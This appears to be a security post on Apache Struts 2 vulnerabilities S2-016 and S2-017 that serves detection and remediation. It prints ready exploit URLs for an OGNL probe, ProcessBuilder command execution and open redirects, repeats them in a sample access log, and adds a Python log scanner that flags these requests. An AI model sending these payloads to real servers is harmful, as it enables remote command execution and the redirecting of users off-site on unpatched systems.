Apache Struts :
An open-source framework for developing Java EE web applications. The flaw is in Struts itself, not in the container, so it is present regardless of which Java-based web/WAS server hosts the application (Apache, WebtoB, iPlanet, WebLogic, WebSphere, Tomcat, etc.).
Affected versions :
Apache Struts 2.0.0 through Struts 2.3.15 (fixed in Struts 2.3.15.1)
http://struts.apache.org/download.cgi#struts23151
Remediation (official Apache Struts advisories; both advise upgrading to Struts 2.3.15.1) :
S2-016 (OGNL injection via the action:/redirect:/redirectAction: parameter prefixes): http://struts.apache.org/release/2.3.x/docs/s2-016.html
S2-017 (open redirect via the redirect:/redirectAction: prefixes): http://struts.apache.org/release/2.3.x/docs/s2-017.html
- Simple Expression - the parameter names are evaluated as OGNL. The prefix (action:, redirect:, redirectAction:) is stripped and the rest of the parameter name is handed to OGNL. `%25` is the URL-encoded `%`, so the application sees `%{3*4}`; a vulnerable server evaluates it and the result shows up in the response (for the redirect variants, in the Location header). This is the safe probe to use before trying anything else.
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
- Command Execution - the same injection point with a java.lang.ProcessBuilder expression; the `'command','goes','here'` strings are a placeholder argv array (each element is one argument, spaces are URL-encoded as `+`).
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
- Open Redirect (S2-017) - the same prefixes accept an arbitrary URL, so no OGNL is needed to redirect a victim off-site.
http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/
http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23
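The three attack shapes above (OGNL probe, ProcessBuilder command execution, open redirect) all share one signature: a query-string parameter *name* that begins with `action:`, `redirect:` or `redirectAction:`. The detector below is an added example written for this post, not code from the Apache Struts project or from the S2-016/S2-017 advisories. It parses constructed Apache combined-format access-log lines (sample data, not real traffic), URL-decodes each parameter name until it is stable so that `%25{` and double-encoded variants both become `%{`, and classifies each hit as an OGNL probe, an RCE attempt (a ProcessBuilder/Runtime reference in the expression) or an open redirect. Function and constant names are this example's own.

```python
import re
from urllib.parse import unquote, urlsplit

# Parameter-name prefixes that Struts 2.0.0 - 2.3.15 handled specially
# (S2-016: the text after the colon was evaluated as OGNL;
#  S2-017: redirect:/redirectAction: accepted an arbitrary URL).
DANGEROUS_PREFIXES = ("action:", "redirect:", "redirectAction:")

# Start of an OGNL expression in either %{...} or ${...} form.
OGNL_MARKER = re.compile(r"[%$]\{")

# Substrings that a command-execution payload almost always carries.
RCE_HINTS = ("java.lang.ProcessBuilder", "java.lang.Runtime", "getRuntime", ".exec(")

# Request line inside an Apache combined log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(s, max_rounds=3):
    """URL-decode until the string stops changing (bounded to avoid loops).

    The advisory payloads are encoded once (%25 -> %); attackers also
    double-encode, so one pass is not enough for detection."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def split_query_names(target):
    """Return the raw parameter *names* of a request target's query string.

    Done by hand rather than with parse_qs: the whole exploit token has no
    '=' in it, so the entire token is the name, and parse_qs would drop it
    unless keep_blank_values=True."""
    query = urlsplit(target).query
    return [pair.split("=", 1)[0] for pair in query.split("&") if pair]


def classify_request(target):
    """Return None for a benign request, else a dict describing the finding."""
    for raw_name in split_query_names(target):
        name = decode_fully(raw_name)
        for prefix in DANGEROUS_PREFIXES:
            if not name.startswith(prefix):
                continue
            payload = name[len(prefix):]
            if OGNL_MARKER.search(payload):
                severity = "rce" if any(h in payload for h in RCE_HINTS) else "ognl-probe"
            else:
                severity = "open-redirect"  # S2-017 shape: prefix + plain URL
            return {"prefix": prefix, "payload": payload, "severity": severity}
    return None


def scan_access_log(text):
    """Yield (line_number, finding) for every suspicious request in the log."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        finding = classify_request(m.group("target"))
        if finding:
            findings.append((lineno, finding))
    return findings


# Constructed sample log (hypothetical hosts and timestamps, not real traffic).
# Line 1: the 3*4 probe; line 2: ProcessBuilder RCE; line 3: open redirect;
# line 4: benign request whose parameter is merely *named* "redirect";
# line 5: double-encoded ${3*4} via the redirectAction: prefix.
LOG_SAMPLE = """\
10.0.0.5 - - [10/Jul/2013:12:00:01 +0900] "GET /struts2-blank/example/X.action?action:%25{3*4} HTTP/1.1" 200 512
10.0.0.5 - - [10/Jul/2013:12:00:02 +0900] "GET /struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'id'})).start()} HTTP/1.1" 302 0
10.0.0.7 - - [10/Jul/2013:12:00:03 +0900] "GET /struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/ HTTP/1.1" 302 0
10.0.0.9 - - [10/Jul/2013:12:00:04 +0900] "GET /struts2-showcase/employee/save.action?name=alice&redirect=no HTTP/1.1" 200 1024
10.0.0.5 - - [10/Jul/2013:12:00:05 +0900] "GET /struts2-blank/example/X.action?redirectAction:%2524%257B3*4%257D HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for lineno, finding in scan_access_log(LOG_SAMPLE):
        print(f"line {lineno}: {finding['severity']:13} {finding['prefix']} {finding['payload']}")
```

Run it against a real access log by replacing `LOG_SAMPLE` with the file contents; on a WAF or in Struts itself the equivalent control is to reject any parameter name containing `:` before the DefaultActionMapper sees it, and to upgrade to 2.3.15.1 or later as the advisories require.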